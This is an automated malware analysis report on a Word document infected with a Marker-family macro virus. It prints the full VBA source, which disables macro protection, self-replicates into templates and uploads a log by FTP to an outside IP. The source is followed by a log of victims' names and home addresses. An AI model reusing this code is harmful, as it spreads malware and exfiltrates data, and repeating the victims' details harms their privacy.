Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 edd65ffede6789f2…

MALICIOUS

Office (OLE)

123.5 KB Created: 2015-07-23 21:37:00 Authoring application: Microsoft Macintosh Word First seen: 2016-09-21
MD5: b5c4dc8d13add0d492d9ccd9594e317f SHA-1: 64259e4631a3bef88ec7e50cb3064758f23baeb0 SHA-256: edd65ffede6789f2f338a5d1743e54dc98976335fbf0b518f11f9b6c74c1f49c
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The sample contains VBA macros that are designed to disable macro protection and self-replicate. The script attempts to download a second-stage payload from the IP address 209.201.88.110 and save it as 'c:\netldx.vxd'. This indicates a downloader or droppper functionality, likely delivered via spearphishing.

Heuristics 6

  • ClamAV: Doc.Trojan.Marker-31 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-31
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    'Switch the VirusProtection OFF
Options.VirusProtection = False
  • Callback phishing phone lure medium SE_CALLBACK_LURE
    Document asks the user to call a phone number in billing, refund, subscription, fraud, or security context — consistent with callback phishing or tech-support scam patterns. Suppressed for legitimate-issuer (IRS/gov/official-form) documents that carry no urgency or charge/dispute escalation.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.lifestyleinc.net In document text (OLE body)
    • http://www.co.fillmore.mn.us/In document text (OLE body)
    • http://www.chatfieldpublicschools.net/In document text (OLE body)
    • http://agency.governmentjobs.com/mnmeritsystem/default.cfmIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5991 bytes
SHA-256: b81978d107ce7feff5299df4a9a2e516260a18da6c24f11c4cb09e0a2385bab8
Detection
ClamAV: Doc.Trojan.Marker-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()

On Error Resume Next

Const Marker = "<- this is a marker!"

'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String

'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)


'Switch the VirusProtection OFF
Options.VirusProtection = False


  If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
  
    If DocumentInfected = True Then
      LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
    ElseIf NormalTemplateInfected = True Then
      LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    End If
    
    LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
    
    For i = 1 To 4
      LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
    Next i
    LogFile = "C:\hsf" & LogFile & ".sys"
    
    Open LogFile For Output As #1
    Print #1, LogData
    Close #1
    
    Open "c:\netldx.vxd" For Output As #1
    Print #1, "o 209.201.88.110"
    Print #1, "user anonymous"
    Print #1, "pass itsme@"
    Print #1, "cd incoming"
    Print #1, "ascii"
    Print #1, "put " & LogFile
    Print #1, "quit"
    Close #1
    
    Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
    
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
    
  End If


'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
   
   
  'Infect the NormalTemplate
  If DocumentInfected = True Then
  
    SaveNormalTemplate = NormalTemplate.Saved
  
    OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)

    
    'Write a log file of this NormalTemplate infection
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i

    OurCode = OurCode & Chr(13) & _
              "' " & Format(Time, "hh:mm:ss AMPM - ") & _
                     Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
              "' " & Application.UserName & Chr(13) & _
              "' " & UserAddress & Chr(13)


    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString OurCode
    
    If SaveNormalTemplate = True Then NormalTemplate.Save
    
  End If


  'Infect the ActiveDocument
  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
  
    SaveDocument = ActiveDocument.Saved
    
    OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)

    ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
    ad.CodeModule.AddFromString OurCode
    
    If SaveDocument = True Then ActiveDocument.Save
      
  End If
  
    
End If

End Sub

' Logfile -->

' 09:08:36  - Saturday, 28 Nov 1998
' SPo0Ky
' Blue Planet
'



' 02:50:31 PM - Saturday, 28 Nov 1998
' MARK B. SEAY
'



' 08:04:45 AM - Friday, 4 Dec 1998
' UPS
'



' 11:43:35 AM - Thursday, 17 Dec 1998
' WRO
'



' 03:07:26 PM - Tuesday, 22 Dec 1998
' BCBSA
'



' 03:28:02 PM - Wednesday, 6 Jan 1999
' BCBSA
'



' 02:59:47 PM - Monday, 11 Jan 1999
' Marsha Veach
'



' 01:54:54 PM - Wednesday, 20 Jan 1999
' Connie Sandifer, CMP
'



' 09:33:06 PM - Monday, 25 Jan 1999
' Doug Rowan
'



' 08:21:12 AM - Wednesday, 27 Jan 1999
' IMSI
'



' 10:59:58 AM - Friday, 29 Jan 1999
' Raj
'



' 11:58:16 AM - Wednesday, 17 Feb 1999
' Russell Hyzen
'



' 08:47:57 AM - Tuesday, 8 Jun 1999
' Josh Newman
'



' 09:00:07 AM - Monday, 21 Jun 1999
' John W. Albers, DVM
'



' 08:06:48 AM - Thursday, 1 Jul 1999
' MSC4
'



' 05:53:54 AM - Friday, 16 Jul 1999
' Rrogers
'



' 03:40:39 PM - Monday, 9 Aug 1999
' Beth Edwards
'



' 12:54:37 PM - Thursday, 2 Sep 1999
' Beth Edwards
'



' 11:00:11 AM - Tuesday, 14 Sep 1999
' Janice Trumpeter
'



' 05:50:48 AM - Saturday, 9 Oct 1999
' Pentium 2
' Nicole Armstrong
' 7178 S. Willa Lane
' Evergreen CO 80439-5652



' 02:21:46 PM - Monday, 15 Nov 1999
' Doug Armstrong
'



' 04:09:44 PM - Monday, 15 Nov 1999
' Chassy Wright
'



' 01:45:40 PM - Wednesday, 1 Mar 2000
' City of Spring Valley
'



' 01:29:14 PM - Friday, 3 Mar 2000
' David Phillips
'



' 10:54:46 PM - Thursday, 25 May 2000
' Melissa Vander Plas
'



' 04:01:24 PM - Thursday, 18 Jul 2002
' Mike
'



' 11:27:41 AM - Monday, 9 Dec 2002
' David Phillips
'


' 11:37:12 AM - Thursday, 27 Apr 2006
' Melissa Vander Plas
' Bluff Country Newspaper Group
'


' 07:15:08 PM - Tuesday, 25 Jul 2006
' Dave Phillips
'


' 09:12:06 AM - Wednesday, 16 May 2007
' David Philliips
' 808 Ford Ave.
' Spring Valley, MN 55975
' USA



' 09:49:21 AM - Friday, 18 May 2007
' Debby Groth
' 141 S. Broadway Ave.
' Spring Valley, MN 55975
' USA


' 03:00:00 PM - Monday, 11 Jun 2007
' Spring Valley Tribune
'



' 09:30:07 AM - Monday, 6 Aug 2007
' Spring Valley Tribune
'


' 08:37:14 AM - Monday, 17 Sep 2007
' Debby Groth
'



' 10:16:19 AM - Tuesday, 22 May 2012
' Debby Groth
'

Open this report in the interactive analyzer, or submit your own file for analysis.